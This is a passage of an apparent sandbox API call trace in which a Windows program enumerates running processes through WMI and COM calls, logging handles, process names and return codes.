Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.548] IUnknown:QueryInterface (in: This=0x5e924c8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.549] IUnknown:AddRef (This=0x5e924c8) returned 0x3 [0224.549] IUnknown:QueryInterface (in: This=0x5e924c8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.549] IUnknown:QueryInterface (in: This=0x5e924c8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.549] IUnknown:QueryInterface (in: This=0x5e924c8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5e924cc) returned 0x0 [0224.549] IMarshal:GetUnmarshalClass (in: This=0x5e924cc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.549] IUnknown:Release (This=0x5e924cc) returned 0x3 [0224.549] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.549] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.549] IUnknown:QueryInterface (in: This=0x5e924c8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.549] IUnknown:Release (This=0x5e924c8) returned 0x2 [0224.549] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.549] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.549] IUnknown:QueryInterface (in: This=0x5e924c8, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5e924c8) returned 0x0 [0224.549] IUnknown:AddRef (This=0x5e924c8) returned 0x4 [0224.549] IUnknown:Release (This=0x5e924c8) returned 0x3 [0224.549] IUnknown:Release (This=0x5e924c8) returned 0x2 [0224.549] CoTaskMemFree (pv=0x5e89350) [0224.550] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.550] IUnknown:AddRef (This=0x5e924c8) returned 0x3 [0224.550] IWbemClassObject:Get (in: This=0x5e924c8, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.550] IWbemClassObject:Get (in: This=0x5e924c8, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2408\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.550] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2408\"") returned 0x66 [0224.550] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2408\"") returned 0x66 [0224.550] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.550] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.550] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.550] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.551] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e89350) returned 0x0 [0224.552] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89350, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.552] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89350, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8a430) returned 0x0 [0224.552] WbemDefPath:IUnknown:Release (This=0x5e89350) returned 0x0 [0224.552] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a430, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8a430) returned 0x0 [0224.552] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a430, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.552] WbemDefPath:IUnknown:AddRef (This=0x5e8a430) returned 0x3 [0224.552] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a430, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.552] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a430, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.552] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a430, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e89360) returned 0x0 [0224.552] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e89360, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.552] WbemDefPath:IUnknown:Release (This=0x5e89360) returned 0x3 [0224.552] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.552] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.552] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a430, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.553] WbemDefPath:IUnknown:Release (This=0x5e8a430) returned 0x2 [0224.553] WbemDefPath:IUnknown:Release (This=0x5e8a430) returned 0x1 [0224.553] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.553] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.553] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a430, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8a430) returned 0x0 [0224.553] WbemDefPath:IUnknown:AddRef (This=0x5e8a430) returned 0x3 [0224.553] WbemDefPath:IUnknown:Release (This=0x5e8a430) returned 0x2 [0224.553] WbemDefPath:IWbemPath:SetText (This=0x5e8a430, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2408\"") returned 0x0 [0224.553] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.553] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.553] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.553] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.553] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.553] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.553] IWbemClassObject:Get (in: This=0x5e924c8, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e4ce0*=0, plFlavor=0x26e4ce4*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="travel imagine recently.exe", varVal2=0x0), pType=0x26e4ce0*=8, plFlavor=0x26e4ce4*=0) returned 0x0 [0224.553] SysStringByteLen (bstr="travel imagine recently.exe") returned 0x36 [0224.553] SysStringByteLen (bstr="travel imagine recently.exe") returned 0x36 [0224.553] IWbemClassObject:Get (in: This=0x5e924c8, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e4ce0*=8, plFlavor=0x26e4ce4*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="travel imagine recently.exe", varVal2=0x0), pType=0x26e4ce0*=8, plFlavor=0x26e4ce4*=0) returned 0x0 [0224.553] SysStringByteLen (bstr="travel imagine recently.exe") returned 0x36 [0224.553] SysStringByteLen (bstr="travel imagine recently.exe") returned 0x36 [0224.554] CoTaskMemAlloc (cb=0x4) returned 0x5e89390 [0224.554] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89390, puReturned=0x26dde18 | out: apObjects=0x5e89390*=0x5e8b1c0, puReturned=0x26dde18*=0x1) returned 0x0 [0224.554] IUnknown:QueryInterface (in: This=0x5e8b1c0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5e8b1c0) returned 0x0 [0224.554] IUnknown:QueryInterface (in: This=0x5e8b1c0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.554] IUnknown:QueryInterface (in: This=0x5e8b1c0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.555] IUnknown:AddRef (This=0x5e8b1c0) returned 0x3 [0224.555] IUnknown:QueryInterface (in: This=0x5e8b1c0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.555] IUnknown:QueryInterface (in: This=0x5e8b1c0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.555] IUnknown:QueryInterface (in: This=0x5e8b1c0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5e8b1c4) returned 0x0 [0224.555] IMarshal:GetUnmarshalClass (in: This=0x5e8b1c4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.555] IUnknown:Release (This=0x5e8b1c4) returned 0x3 [0224.555] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.555] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.555] IUnknown:QueryInterface (in: This=0x5e8b1c0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.555] IUnknown:Release (This=0x5e8b1c0) returned 0x2 [0224.555] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.555] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.556] IUnknown:QueryInterface (in: This=0x5e8b1c0, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5e8b1c0) returned 0x0 [0224.556] IUnknown:AddRef (This=0x5e8b1c0) returned 0x4 [0224.556] IUnknown:Release (This=0x5e8b1c0) returned 0x3 [0224.556] IUnknown:Release (This=0x5e8b1c0) returned 0x2 [0224.556] CoTaskMemFree (pv=0x5e89390) [0224.556] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.556] IUnknown:AddRef (This=0x5e8b1c0) returned 0x3 [0224.556] IWbemClassObject:Get (in: This=0x5e8b1c0, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.556] IWbemClassObject:Get (in: This=0x5e8b1c0, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2416\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.556] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2416\"") returned 0x66 [0224.556] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2416\"") returned 0x66 [0224.557] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.557] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.557] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.557] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.558] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e89390) returned 0x0 [0224.558] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89390, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.558] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89390, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8a510) returned 0x0 [0224.558] WbemDefPath:IUnknown:Release (This=0x5e89390) returned 0x0 [0224.558] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a510, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8a510) returned 0x0 [0224.558] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a510, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.558] WbemDefPath:IUnknown:AddRef (This=0x5e8a510) returned 0x3 [0224.558] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a510, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.559] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a510, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.559] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a510, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e893a0) returned 0x0 [0224.559] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e893a0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.559] WbemDefPath:IUnknown:Release (This=0x5e893a0) returned 0x3 [0224.559] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.559] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.559] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a510, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.559] WbemDefPath:IUnknown:Release (This=0x5e8a510) returned 0x2 [0224.559] WbemDefPath:IUnknown:Release (This=0x5e8a510) returned 0x1 [0224.559] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.559] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.559] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a510, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8a510) returned 0x0 [0224.559] WbemDefPath:IUnknown:AddRef (This=0x5e8a510) returned 0x3 [0224.559] WbemDefPath:IUnknown:Release (This=0x5e8a510) returned 0x2 [0224.559] WbemDefPath:IWbemPath:SetText (This=0x5e8a510, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2416\"") returned 0x0 [0224.559] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.559] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.559] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.559] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.559] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.559] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.559] IWbemClassObject:Get (in: This=0x5e8b1c0, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e558c*=0, plFlavor=0x26e5590*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="school_for.exe", varVal2=0x0), pType=0x26e558c*=8, plFlavor=0x26e5590*=0) returned 0x0 [0224.559] SysStringByteLen (bstr="school_for.exe") returned 0x1c [0224.560] SysStringByteLen 